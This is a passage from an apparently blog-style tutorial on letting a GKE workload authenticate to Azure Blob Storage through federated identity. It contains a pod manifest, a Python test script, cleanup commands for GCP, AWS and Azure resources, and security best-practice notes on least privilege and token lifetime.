    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_TENANT_ID&lt;/span&gt;
      &lt;span class="c1"&gt;# Replace with your actual Tenant ID (get via: az account show --query tenantId -o tsv)&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_TENANT_ID"&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_FEDERATED_TOKEN_FILE&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/azure/tokens/azure-identity-token&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_STORAGE_ACCOUNT&lt;/span&gt;
      &lt;span class="c1"&gt;# Replace with your actual storage account name&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;gkecrosscloud"&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-token&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/azure/tokens&lt;/span&gt;
      &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test-code-gke&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-identity-token&lt;/span&gt;
          &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
          &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api://AzureADTokenExchange&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test-code-gke&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_azure_from_gke.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code will be provided below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
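The three `AZURE_*` environment variables in the manifest are the entire configuration surface a workload-identity-aware credential needs: client ID, tenant ID, and the path of the projected token file. A self-contained sketch of that discovery step (the IDs and token content are stand-ins, and this models the SDK's behavior rather than calling it):

```python
# Sketch of how a workload-identity credential discovers its inputs:
# three environment variables, one of which points at the projected
# token file. The IDs and token here are stand-ins, not real values.
import tempfile

def discover_workload_identity(environ):
    required = ("AZURE_CLIENT_ID", "AZURE_TENANT_ID", "AZURE_FEDERATED_TOKEN_FILE")
    missing = [k for k in required if k not in environ]
    if missing:
        raise RuntimeError(f"workload identity not configured, missing: {missing}")
    # Read the Kubernetes-projected token that will be exchanged with Azure AD
    with open(environ["AZURE_FEDERATED_TOKEN_FILE"]) as f:
        token = f.read().strip()
    return environ["AZURE_CLIENT_ID"], environ["AZURE_TENANT_ID"], token

# Simulate the projected token file the kubelet would mount
with tempfile.NamedTemporaryFile("w", suffix="-token", delete=False) as tf:
    tf.write("fake-projected-token")

client_id, tenant_id, token = discover_workload_identity({
    "AZURE_CLIENT_ID": "00000000-0000-0000-0000-000000000000",
    "AZURE_TENANT_ID": "11111111-1111-1111-1111-111111111111",
    "AZURE_FEDERATED_TOKEN_FILE": tf.name,
})
print(client_id, token)
```

Because the projected token rotates (here every `expirationSeconds`), the credential re-reads the file on each token request rather than caching its contents.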



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_azure_from_gke.py
&lt;/span&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;azure.identity&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DefaultAzureCredential&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;azure.storage.blob&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BlobServiceClient&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_azure_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Test Azure Blob Storage access from GKE using federated credentials&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# DefaultAzureCredential automatically detects federated identity
&lt;/span&gt;        &lt;span class="n"&gt;credential&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;DefaultAzureCredential&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;storage_account&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;AZURE_STORAGE_ACCOUNT&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;account_url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;storage_account&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;.blob.core.windows.net&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

        &lt;span class="n"&gt;blob_service_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BlobServiceClient&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;account_url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;account_url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;credential&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;credential&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# List containers
&lt;/span&gt;        &lt;span class="n"&gt;containers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blob_service_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_containers&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;✅ Azure Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; containers:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;container&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;container&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;❌ Azure Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_azure_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success Logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If &lt;code&gt;kubectl logs -f -n default gke-azure-test&lt;/code&gt; shows output like the following, the GKE-to-Azure authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ Azure Authentication successful!
Found 1 containers:
  - test-container
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h3&gt;
  
  
  Scenario 3 Cleanup
&lt;/h3&gt;

&lt;p&gt;After testing Scenario 3 (GKE cross-cloud authentication), clean up the resources:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# GCP Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"gke-cross-cloud-sa@&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.iam.gserviceaccount.com"&lt;/span&gt;

&lt;span class="c"&gt;# Remove IAM policy binding&lt;/span&gt;
gcloud iam service-accounts remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.workloadIdentityUser &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.svc.id.goog[default/gke-cross-cloud-sa]"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete GCS bucket&lt;/span&gt;
gcloud storage &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; gs://gke-cross-cloud

&lt;span class="c"&gt;# Remove project-level permissions&lt;/span&gt;
gcloud projects remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

&lt;span class="c"&gt;# Delete GCP service account&lt;/span&gt;
gcloud iam service-accounts delete &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# AWS Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Get OIDC provider info&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;CLUSTER_LOCATION&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"us-central1"&lt;/span&gt;  &lt;span class="c"&gt;# Update to your cluster location&lt;/span&gt;

&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;curl &lt;span class="nt"&gt;-s&lt;/span&gt; https://container.googleapis.com/v1/projects/YOUR_PROJECT_ID/locations/us-central1/clusters/my-gke-cluster/.well-known/openid-configuration | jq &lt;span class="nt"&gt;-r&lt;/span&gt; .issuer&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"s/^https:&lt;/span&gt;&lt;span class="se"&gt;\/\/&lt;/span&gt;&lt;span class="s2"&gt;//"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Delete IAM role policy attachments&lt;/span&gt;
aws iam detach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; gke-to-aws-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

&lt;span class="c"&gt;# Delete IAM role&lt;/span&gt;
aws iam delete-role &lt;span class="nt"&gt;--role-name&lt;/span&gt; gke-to-aws-role

&lt;span class="c"&gt;# Delete OIDC provider&lt;/span&gt;
&lt;span class="nv"&gt;ACCOUNT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws sts get-caller-identity &lt;span class="nt"&gt;--query&lt;/span&gt; Account &lt;span class="nt"&gt;--output&lt;/span&gt; text&lt;span class="si"&gt;)&lt;/span&gt;
aws iam delete-open-id-connect-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--open-id-connect-provider-arn&lt;/span&gt; &lt;span class="s2"&gt;"arn:aws:iam::&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;ACCOUNT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;:oidc-provider/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# Azure Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Get App ID&lt;/span&gt;
&lt;span class="nv"&gt;APP_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az ad app list &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt; gke-to-azure-app &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"[0].appId"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Delete role assignments&lt;/span&gt;
&lt;span class="nv"&gt;SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
az role assignment delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&lt;/span&gt;&lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# Delete federated credentials&lt;/span&gt;
az ad app federated-credential delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--federated-credential-id&lt;/span&gt; gke-federated-identity

&lt;span class="c"&gt;# Delete service principal&lt;/span&gt;
az ad sp delete &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt;

&lt;span class="c"&gt;# Delete app registration&lt;/span&gt;
az ad app delete &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt;

&lt;span class="c"&gt;# Delete resource group&lt;/span&gt;
az group delete &lt;span class="nt"&gt;--name&lt;/span&gt; gke-cross-cloud &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt; &lt;span class="nt"&gt;--yes&lt;/span&gt; &lt;span class="nt"&gt;--no-wait&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# Kubernetes Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Delete test pods&lt;/span&gt;
kubectl delete pod gke-gcp-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete pod gke-aws-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete pod gke-azure-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;

&lt;span class="c"&gt;# Delete ConfigMaps&lt;/span&gt;
kubectl delete configmap gcp-test-code-gke &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap aws-test-code-gke &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap azure-test-code-gke &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;

&lt;span class="c"&gt;# Delete service account&lt;/span&gt;
kubectl delete serviceaccount gke-cross-cloud-sa &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Security Best Practices
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Principle of Least Privilege
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Grant only the minimum permissions required&lt;/li&gt;
&lt;li&gt;Use resource-specific policies instead of broad access&lt;/li&gt;
&lt;li&gt;Regularly audit and review permissions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ❌ BAD: Subscription-wide access&lt;/span&gt;
az role assignment create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; &lt;span class="s2"&gt;"Storage Blob Data Reader"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&lt;/span&gt;&lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# ✅ GOOD: Resource-specific access&lt;/span&gt;
az role assignment create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; &lt;span class="s2"&gt;"Storage Blob Data Reader"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="nv"&gt;$STORAGE_ACCOUNT_ID&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2. Namespace Isolation
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Use different service accounts per namespace&lt;/li&gt;
&lt;li&gt;Implement namespace-level RBAC&lt;/li&gt;
&lt;li&gt;Separate production and development workloads&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3. Token Lifetime Management
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Use short-lived tokens (default is usually 1 hour)&lt;/li&gt;
&lt;li&gt;Enable automatic token rotation&lt;/li&gt;
&lt;li&gt;Monitor token usage and expiration&lt;/li&gt;
&lt;/ul&gt;
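To monitor expiration, you can inspect a projected token's `exp` claim locally. Below is a minimal sketch (the helper name is mine, not from any cloud SDK); it decodes the payload without verifying the signature, so use it only for observability, never for trust decisions:

```python
import base64
import json

def token_remaining_seconds(jwt: str, now: int) -> int:
    """Seconds until the token's `exp` claim, decoded WITHOUT signature verification.

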